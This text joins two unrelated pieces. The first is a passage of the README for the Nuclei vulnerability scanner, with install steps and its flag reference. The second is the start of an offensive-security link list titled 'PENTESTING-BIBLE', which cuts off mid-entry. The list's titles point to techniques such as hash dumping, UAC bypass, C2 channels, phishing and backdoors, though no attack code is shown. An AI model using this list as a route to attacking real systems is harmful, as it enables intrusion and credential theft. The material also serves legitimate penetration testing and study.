href="#install-nuclei">Install</a> • <a href="#for-security-engineers">For Security Engineers</a> • <a href="#for-developers-and-organisations">For Developers</a> • <a href="https://nuclei.projectdiscovery.io/nuclei/get-started/">Documentation</a> • <a href="#credits">Credits</a> • <a href="https://nuclei.projectdiscovery.io/faq/nuclei/">FAQs</a> • <a href="https://discord.gg/projectdiscovery">Join Discord</a> </p> <p align="center"> <a href="https://github.com/projectdiscovery/nuclei/blob/master/README.md">English</a> • <a href="https://github.com/projectdiscovery/nuclei/blob/master/README_CN.md">中文</a> </p> --- Nuclei is used to send requests across targets based on a template leading to zero false positives and providing fast scanning on large number of hosts. Nuclei offers scanning for a variety of protocols including TCP, DNS, HTTP, File, etc. With powerful and flexible templating, all kinds of security checks can be modelled with Nuclei. We have a [dedicated repository](https://github.com/projectdiscovery/nuclei-templates) that houses various type of vulnerability templates contributed by **more than 200** security researchers and engineers. ## How it works <h3 align="center"> <img src="static/nuclei-flow.jpg" alt="nuclei-flow" width="700px"></a> </h3> # Install Nuclei Nuclei requires **go1.17** to install successfully. Run the following command to install the latest version - ```sh go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest ``` **More installation [methods can be found here](https://nuclei.projectdiscovery.io/nuclei/get-started/).** <table> <tr> <td> ### Nuclei Templates Nuclei has built-in support for automatic template download/update as default since version [v2.5.2](https://github.com/projectdiscovery/nuclei/releases/tag/v2.5.2). [**Nuclei-Templates**](https://github.com/projectdiscovery/nuclei-templates) project provides a community-contributed list of ready-to-use templates that is constantly updated. You may still use the `update-templates` flag to update the nuclei templates at any time; You can write your own checks for your individual workflow and needs following Nuclei's [templating guide](https://nuclei.projectdiscovery.io/templating-guide/). The YAML DSL reference syntax is available [here](SYNTAX-REFERENCE.md). </td> </tr> </table> ### Usage ```sh nuclei -h ``` This will display help for the tool. Here are all the switches it supports. ```yaml Nuclei is a fast, template based vulnerability scanner focusing on extensive configurability, massive extensibility and ease of use. Usage: nuclei [flags] Flags: TARGET: -u, -target string[] target URLs/hosts to scan -l, -list string path to file containing a list of target URLs/hosts to scan (one per line) TEMPLATES: -t, -templates string[] template or template directory paths to include in the scan -tu, -template-url string[] URL containing list of templates to run -nt, -new-templates run only new templates added in latest nuclei-templates release -w, -workflows string[] workflow or workflow directory paths to include in the scan -wu, -workflow-url string[] URL containing list of workflows to run -validate validate the passed templates to nuclei -tl list all available templates FILTERING: -tags string[] execute a subset of templates that contain the provided tags -itags, -include-tags string[] tags from the default deny list that permit executing more intrusive templates -etags, -exclude-tags string[] exclude templates with the provided tags -it, -include-templates string[] templates to be executed even if they are excluded either by default or configuration -et, -exclude-templates string[] template or template directory paths to exclude -s, -severity value[] Templates to run based on severity. Possible values info,low,medium,high,critical -es, -exclude-severity value[] Templates to exclude based on severity. Possible values info,low,medium,high,critical -pt, -type value[] protocol types to be executed. Possible values dns,file,http,headless,network,workflow,ssl,websocket -ept, -exclude-type value[] protocol types to not be executed. Possible values dns,file,http,headless,network,workflow,ssl,websocket -a, -author string[] execute templates that are (co-)created by the specified authors OUTPUT: -o, -output string output file to write found issues/vulnerabilities -silent display findings only -nc, -no-color disable output content coloring (ANSI escape codes) -json write output in JSONL(ines) format -irr, -include-rr include request/response pairs in the JSONL output (for findings only) -nm, -no-meta don't display match metadata -nts, -no-timestamp don't display timestamp metadata in CLI output -rdb, -report-db string local nuclei reporting database (always use this to persist report data) -ms, -matcher-status show optional match failure status -me, -markdown-export string directory to export results in markdown format -se, -sarif-export string file to export results in SARIF format CONFIGURATIONS: -config string path to the nuclei configuration file -rc, -report-config string nuclei reporting module configuration file -H, -header string[] custom headers in header:value format -V, -var value custom vars in var=value format -r, -resolvers string file containing resolver list for nuclei -sr, -system-resolvers use system DNS resolving as error fallback -passive enable passive HTTP response processing mode -ev, -env-vars enable environment variables to be used in template -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts INTERACTSH: -iserver, -interactsh-server string interactsh server url for self-hosted instance (default "https://interact.sh") -itoken, -interactsh-token string authentication token for self-hosted interactsh server -interactions-cache-size int number of requests to keep in the interactions cache (default 5000) -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60) -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5) -interactions-cooldown-period int extra time for interaction polling before exiting (default 5) -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates RATE-LIMIT: -rl, -rate-limit int maximum number of requests to send per second (default 150) -rlm, -rate-limit-minute int maximum number of requests to send per minute -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25) -c, -concurrency int maximum number of templates to be executed in parallel (default 25) -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10) -hc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10) OPTIMIZATIONS: -timeout int time to wait in seconds before timeout (default 5) -retries int number of times to retry a failed request (default 1) -mhe, -max-host-error int max errors for a host before skipping from scan (default 30) -project use a project folder to avoid sending same request multiple times -project-path string set a specific project path -spm, -stop-at-first-path stop processing HTTP requests after the first match (may break template/workflow logic) -stream Stream mode - start elaborating without sorting the input HEADLESS: -headless enable templates that require headless browser support -page-timeout int seconds to wait for each page in headless mode (default 20) -sb, -show-browser show the browser on the screen when running templates with headless mode -sc, -system-chrome Use local installed chrome browser instead of nuclei installed DEBUG: -debug show all requests and responses -debug-req show all sent requests -debug-resp show all received responses -p, -proxy string[] List of HTTP(s)/SOCKS5 proxy to use (comma separated or file input) -tlog, -trace-log string file to write sent requests trace log -elog, -error-log string file to write sent requests error log -version show nuclei version -v, -verbose show verbose output -vv display templates loaded for scan -tv, -templates-version shows the version of the installed nuclei-templates UPDATE: -update update nuclei engine to the latest released version -ut, -update-templates update nuclei-templates to latest released version -ud, -update-directory string overwrite the default directory to install nuclei-templates -duc, -disable-update-check disable automatic nuclei/templates update check STATISTICS: -stats display statistics about the running scan -sj, -stats-json write statistics data to an output file in JSONL(ines) format -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5) -m, -metrics expose nuclei metrics on a port -mp, -metrics-port int port to expose nuclei metrics on (default 9092) ``` ### Running Nuclei Scanning target domain with [community-curated](https://github.com/projectdiscovery/nuclei-templates) nuclei templates. ```sh nuclei -u https://example.com ``` Scanning target URLs with [community-curated](https://github.com/projectdiscovery/nuclei-templates) nuclei templates. ```sh nuclei -list urls.txt ``` Example of `urls.txt`: ```yaml http://example.com http://app.example.com http://test.example.com http://uat.example.com ``` **More detailed examples of running nuclei can be found [here](https://nuclei.projectdiscovery.io/nuclei/get-started/#running-nuclei).** # For Security Engineers Nuclei offers great number of features that are helpful for security engineers to customise workflow in their organisation. With the varieties of scan capabilities (like DNS, HTTP, TCP), security engineers can easily create their suite of custom checks with Nuclei. - Varieties of protocols supported: TCP, DNS, HTTP, File, etc - Achieve complex vulnerability steps with workflows and [dynamic requests.](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/) - Easy to integrate into CI/CD, designed to be easily integrated into regression cycle to actively check the fix and re-appearance of vulnerability. <h1 align="left"> <a href="https://nuclei.projectdiscovery.io/nuclei/get-started/"><img src="static/learn-more-button.png" width="170px" alt="Learn More"></a> </h1> <table> <tr> <td> **For Bug Bounty hunters:** Nuclei allows you to customise your testing approach with your own suite of checks and easily run across your bug bounty programs. Moreover, Nuclei can be easily integrated into any continuous scanning workflow. - Designed to be easily integrated into other tool workflow. - Can process thousands of hosts in few minutes. - Easily automate your custom testing approach with our simple YAML DSL. Please check our other open-source projects that might fit into your bug bounty workflow: [github.com/projectdiscovery](http://github.com/projectdiscovery), we also host daily [refresh of DNS data at Chaos](http://chaos.projectdiscovery.io). </td> </tr> </table> <table> <tr> <td> **For Penetration Testers:** Nuclei immensely improve how you approach security assessment by augmenting the manual, repetitive processes. Consultancies are already converting their manual assessment steps with Nuclei, it allows them to run set of their custom assessment approach across thousands of hosts in an automated manner. Pen-testers get the full power of our public templates and customization capabilities to speed up their assessment process, and specifically with the regression cycle where you can easily verify the fix. - Easily create your compliance, standards suite (e.g. OWASP Top 10) checklist. - With capabilities like [fuzz](https://nuclei.projectdiscovery.io/templating-guide/#advance-fuzzing) and [workflows](https://nuclei.projectdiscovery.io/templating-guide/#workflows), complex manual steps and repetitive assessment can be easily automated with Nuclei. - Easy to re-test vulnerability-fix by just re-running the template. </td> </tr> </table> # For Developers and Organisations Nuclei is built with simplicity in mind, with the community backed templates by hundreds of security researchers, it allows you to stay updated with the latest security threats using continuous Nuclei scanning on the hosts. It is designed to be easily integrated into regression tests cycle, to verify the fixes and eliminate vulnerabilities from occurring in the future. - **CI/CD:** Engineers are already utilising Nuclei within their CI/CD pipeline, it allows them to constantly monitor their staging and production environments with customised templates. - **Continuous Regression Cycle:** With Nuclei, you can create your custom template on every new identified vulnerability and put into Nuclei engine to eliminate in the continuous regression cycle. We have [a discussion thread around this](https://github.com/projectdiscovery/nuclei-templates/discussions/693), there are already some bug bounty programs giving incentives to hackers on writing nuclei templates with every submission, that helps them to eliminate the vulnerability across all their assets, as well as to eliminate future risk in reappearing on productions. If you're interested in implementing it in your organisation, feel free to [reach out to us](mailto:[email protected]). We will be more than happy to help you in the getting started process, or you can also post into the [discussion thread for any help](https://github.com/projectdiscovery/nuclei-templates/discussions/693). <h3 align="center"> <img src="static/regression-with-nuclei.jpg" alt="regression-cycle-with-nuclei" width="1100px"></a> </h3> <h1 align="left"> <a href="https://github.com/projectdiscovery/nuclei-action"><img src="static/learn-more-button.png" width="170px" alt="Learn More"></a> </h1> ### Resources - [Scanning Live Web Applications with Nuclei in CI/CD Pipeline](https://blog.escape.tech/devsecops-part-iii-scanning-live-web-applications/) by [@TristanKalos](https://twitter.com/TristanKalos) - [Community Powered Scanning with Nuclei](https://blog.projectdiscovery.io/community-powered-scanning-with-nuclei/) - [Nuclei Unleashed - Quickly write complex exploits](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/) - [Nuclei - Fuzz all the things](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-things/) - [Nuclei + Interactsh Integration for Automating OOB Testing](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) - [Weaponizes nuclei Workflows to Pwn All the Things](https://medium.com/@dwisiswant0/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77) by [@dwisiswant0](https://github.com/dwisiswant0) - [How to Scan Continuously with Nuclei?](https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9) by [@dwisiswant0](https://github.com/dwisiswant0) - [Hack with Automation !!!](https://dhiyaneshgeek.github.io/web/security/2021/07/19/hack-with-automation/) by [@DhiyaneshGeek](https://github.com/DhiyaneshGeek) ### Credits Thanks to all the amazing community [contributors for sending PRs](https://github.com/projectdiscovery/nuclei/graphs/contributors). Do also check out the below similar open-source projects that may fit in your workflow: [FFuF](https://github.com/ffuf/ffuf), [Qsfuzz](https://github.com/ameenmaali/qsfuzz), [Inception](https://github.com/proabiral/inception), [Snallygaster](https://github.com/hannob/snallygaster), [Gofingerprint](https://github.com/Static-Flow/gofingerprint), [Sn1per](https://github.com/1N3/Sn1per/tree/master/templates), [Google tsunami](https://github.com/google/tsunami-security-scanner), [Jaeles](https://github.com/jaeles-project/jaeles), [ChopChop](https://github.com/michelin/ChopChop) ### License Nuclei is distributed under [MIT License](https://github.com/projectdiscovery/nuclei/blob/master/LICENSE.md) <h1 align="left"> <a href="https://discord.gg/projectdiscovery"><img src="static/Join-Discord.png" width="380" alt="Join Discord"></a> <a href="https://nuclei.projectdiscovery.io"><img src="static/check-nuclei-documentation.png" width="380" alt="Check Nuclei Documentation"></a> </h1>
# PENTESTING-BIBLE # Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY. # Created By Ammar Amer (Twitter @cry__pto) ## Support. *Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker) -1- 3 Ways Extract Password Hashes from NTDS.dit: https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/ -3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty: www.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/ -4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection: https://medium.com/p/2e143eb36941 -5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality: https://medium.com/p/a11bb5f863b3/share/twitter -6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company: https://medium.com/p/a69afe5a0899 -7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation: https://medium.com/p/b29355a8e68e -9-Recon — my way: https://medium.com/p/82b7e5f62e21 -10-Reconnaissance: a eulogy in three acts: https://medium.com/p/7840824b9ef2 -11-Red-Teaming-Toolkit: https://github.com/infosecn1nja/Red-Teaming-Toolkit -12-Red Team Tips: https://vincentyiu.co.uk/ -13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL: https://modexp.wordpress.com/2019/04/24/glibc-shellcode/ -14-Shellcode: Encrypting traffic: https://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/ -15-Penetration Testing of an FTP Server: https://medium.com/p/19afe538be4b -16-Reverse Engineering of the Anubis Malware — Part 1: https://medium.com/p/741e12f5a6bd -17-Privilege Escalation on Linux with Live examples: https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ -18-Pentesting Cheatsheets: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -19-Powershell Payload Delivery via DNS using Invoke-PowerCloud: https://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud -20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS: https://sguru.org/ghdb-download-list-4500-google-dorks-free/ -21-SQL Injection Cheat Sheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -22-SQLmap’s os-shell + Backdooring website with Weevely: https://medium.com/p/8cb6dcf17fa4 -23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips: https://medium.com/p/c5a3f5764cb3 -24-Top 10 Essential NMAP Scripts for Web App Hacking: https://medium.com/p/c7829ff5ab7 -25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!: https://medium.com/p/52cf5c5640a1 -26-Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -27-XSS Payloads, getting past alert(1): https://medium.com/p/217ab6c6ead7 -28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical: https://medium.com/p/50d8135b7549 -29-Web Application Firewall (WAF) Evasion Techniques: https://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques -30-OSINT Resources for 2019: https://medium.com/p/b15d55187c3f -31-The OSINT Toolkit: https://medium.com/p/3b9233d1cdf9 -32-OSINT : Chasing Malware + C&C Servers: https://medium.com/p/3c893dc1e8cb -33-OSINT tool for visualizing relationships between domains, IPs and email addresses: https://medium.com/p/94377aa1f20a -34-From OSINT to Internal – Gaining Access from outside the perimeter: https://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter -35-Week in OSINT #2018–35: https://medium.com/p/b2ab1765157b -36-Week in OSINT #2019–14: https://medium.com/p/df83f5b334b4 -37-Instagram OSINT | What A Nice Picture: https://medium.com/p/8f4c7edfbcc6 -38-awesome-osint: https://github.com/jivoi/awesome-osint -39-OSINT_Team_Links: https://github.com/IVMachiavelli/OSINT_Team_Links -40-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -41-Hacking Cryptocurrency Miners with OSINT Techniques: https://medium.com/p/677bbb3e0157 -42-A penetration tester’s guide to sub- domain enumeration: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5 -43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages: https://blackarch.org/recon.html -44-What tools I use for my recon during BugBounty: https://medium.com/p/ec25f7f12e6d -45-Command and Control – DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/ -46-Command and Control – WebDAV: https://pentestlab.blog/2017/09/12/command-and-control-webdav/ -47-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -48-Command and Control – Kernel: https://pentestlab.blog/2017/10/02/command-and-control-kernel/ -49-Source code disclosure via exposed .git folder: https://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html -50-Pentesting Cheatsheet: https://hausec.com/pentesting-cheatsheet/ -51-Windows Userland Persistence Fundamentals: https://www.fuzzysecurity.com/tutorials/19.html -52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up: https://medium.com/p/abdc7c269dd5 -53-awesome-bug-bounty: https://github.com/djadmin/awesome-bug-bounty -54-dostoevsky-pentest-notes: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -55-awesome-pentest: https://github.com/enaqx/awesome-pentest -56-awesome-windows-exploitation: https://github.com/enddo/awesome-windows-exploitation -57-awesome-exploit-development: https://github.com/FabioBaroni/awesome-exploit-development -58-BurpSuit + SqlMap = One Love: https://medium.com/p/64451eb7b1e8 -59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat: https://medium.com/p/a5a5d3ffea46 -60-DLL Injection: https://pentestlab.blog/2017/04/04/dll-injection -61-DLL Hijacking: https://pentestlab.blog/2017/03/27/dll-hijacking -62-My Recon Process — DNS Enumeration: https://medium.com/p/d0e288f81a8a -63-Google Dorks for nding Emails, Admin users etc: https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc -64-Google Dorks List 2018: https://medium.com/p/fb70d0cbc94 -65-Hack your own NMAP with a BASH one-liner: https://medium.com/p/758352f9aece -66-UNIX / LINUX CHEAT SHEET: cheatsheetworld.com/programming/unix-linux-cheat-sheet/ -67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -68- information gathering: https://pentestlab.blog/category/information-gathering/ -69-post exploitation: https://pentestlab.blog/category/post-exploitation/ -70-privilege escalation: https://pentestlab.blog/category/privilege-escalation/ -71-red team: https://pentestlab.blog/category/red-team/ -72-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -73-Web Application Penetration Testing Cheat Sheet: https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/ -74-Windows Kernel Exploits: https://pentestlab.blog/2017/04/24/windows-kernel-exploits -75-Windows oneliners to download remote payload and execute arbitrary code: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ -76-Windows-Post-Exploitation: https://github.com/emilyanncr/Windows-Post-Exploitation -77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows: https://medium.com/p/a2ddc3557403 -78-Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html -79-Windows Privilege Escalation Guide: www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -80-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -81-Windows Exploitation Tricks: Abusing the User-Mode Debugger: https://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html -82-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -83- Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking -84-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -85-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -86-Comprehensive Guide to Sqlmap (Target Options): http://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2 -87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE: www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple -88-Comprehensive Guide on Gobuster Tool: https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/ -89-My Top 5 Web Hacking Tools: https://medium.com/p/e15b3c1f21e8 -90-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -91-File System Access on Webserver using Sqlmap: http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap -92-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -93-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd): http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa -95-XSS Payload List - Cross Site Scripting Vulnerability Payload List: https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html -96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection: https://www.notsosecure.com/analyzing-cve-2018-6376/ -97-Exploiting Sql Injection with Nmap and Sqlmap: http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap -98-awesome-malware-analysis: https://github.com/rshipp/awesome-malware-analysis -99-Anatomy of UAC Attacks: https://www.fuzzysecurity.com/tutorials/27.html -100-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -101-5 ways to Banner Grabbing: http://www.hackingarticles.in/5-ways-banner-grabbing -102-6 Ways to Hack PostgresSQL Login: http://www.hackingarticles.in/6-ways-to-hack-postgressql-login -103-6 Ways to Hack SSH Login Password: http://www.hackingarticles.in/6-ways-to-hack-ssh-login-password -104-10 Free Ways to Find Someone’s Email Address: https://medium.com/p/e6f37f5fe10a -105-USING A SCF FILE TO GATHER HASHES: https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes -106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit): http://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit 107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities: http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities -108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs): https://medium.com/p/ef6542301c65 -109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information: https://gbhackers.com/external-black-box-penetration-testing -110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals: https://gbhackers.com/hacking-tools-list -111-Most Important Considerations with Malware Analysis Cheats And Tools list: https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list -112-Awesome-Hacking: https://github.com/Hack-with-Github/Awesome-Hacking -113-awesome-threat-intelligence: https://github.com/hslatman/awesome-threat-intelligence -114-awesome-yara: https://github.com/InQuest/awesome-yara -115-Red-Team-Infrastructure-Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki -116-awesome-pentest: https://github.com/enaqx/awesome-pentest -117-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -118-pentest-wiki: https://github.com/nixawk/pentest-wiki -119-awesome-web-security: https://github.com/qazbnm456/awesome-web-security -120-Infosec_Reference: https://github.com/rmusser01/Infosec_Reference -121-awesome-iocs: https://github.com/sroberts/awesome-iocs -122-blackhat-arsenal-tools: https://github.com/toolswatch/blackhat-arsenal-tools -123-awesome-social-engineering: https://github.com/v2-dev/awesome-social-engineering -124-Penetration Testing Framework 0.59: www.vulnerabilityassessment.co.uk/Penetration%20Test.html -125-Penetration Testing Tools Cheat Sheet : https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ -126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool: https://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool -127-Spear Phishing 101: https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html -128-100 ways to discover (part 1): https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/ -129-Comprehensive Guide to SSH Tunnelling: http://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/ -130-Capture VNC Session of Remote PC using SetToolkit: http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/ -131-Hack Remote PC using PSEXEC Injection in SET Toolkit: http://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/ -132-Denial of Service Attack on Network PC using SET Toolkit: http://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/ -133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit: http://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/ -134-Hack Any Android Phone with DroidJack (Beginner’s Guide): http://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/ -135-HTTP RAT Tutorial for Beginners: http://www.hackingarticles.in/http-rat-tutorial-beginners/ -136-5 ways to Create Permanent Backdoor in Remote PC: http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/ -137-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -138-EMPIRE TIPS AND TRICKS: https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/ -139-CSRF account takeover Explained Automated/Manual: https://medium.com/p/447e4b96485b -140-CSRF Exploitation using XSS: http://www.hackingarticles.in/csrf-exploitation-using-xss -141-Dumping Domain Password Hashes: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough: https://bneg.io/2017/05/24/empire-post-exploitation/ -143-Dropbox for the Empire: https://bneg.io/2017/05/13/dropbox-for-the-empire/ -144-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION: https://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/ -146-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ -148-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ -149-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ -151-enum4linux Cheat Sheet: https://highon.coffee/blog/enum4linux-cheat-sheet/ -152-enumeration: https://technologyredefine.blogspot.com/2017/11/enumeration.html -153-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -154-Command and Control – WMI: https://pentestlab.blog/2017/11/20/command-and-control-wmi -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -156-Comprehensive Guide to Nmap Port Status: http://www.hackingarticles.in/comprehensive-guide-nmap-port-status -157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -158-Compromising Jenkins and extracting credentials: https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/ -159-footprinting: https://technologyredefine.blogspot.com/2017/09/footprinting_17.html -160-awesome-industrial-control-system-security: https://github.com/hslatman/awesome-industrial-control-system-security -161-xss-payload-list: https://github.com/ismailtasdelen/xss-payload-list -162-awesome-vehicle-security: https://github.com/jaredthecoder/awesome-vehicle-security -163-awesome-osint: https://github.com/jivoi/awesome-osint -164-awesome-python: https://github.com/vinta/awesome-python -165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit): https://www.exploit-db.com/download/44830.rb -166-nbtscan Cheat Sheet: https://highon.coffee/blog/nbtscan-cheat-sheet/ -167-neat-tricks-to-bypass-csrfprotection: www.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection -168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2: https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/ -169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts): https://medium.com/p/868a7bd7f692 -170-Nmap Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet/ -171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ -172-Phishing with PowerPoint: https://www.blackhillsinfosec.com/phishing-with-powerpoint/ -173-hide-payload-ms-office-document-properties: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/ -174-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -175-How to Build a C2 Infrastructure with Digital Ocean – Part 1: https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/ -176-WordPress Penetration Testing using Symposium Plugin SQL Injection: 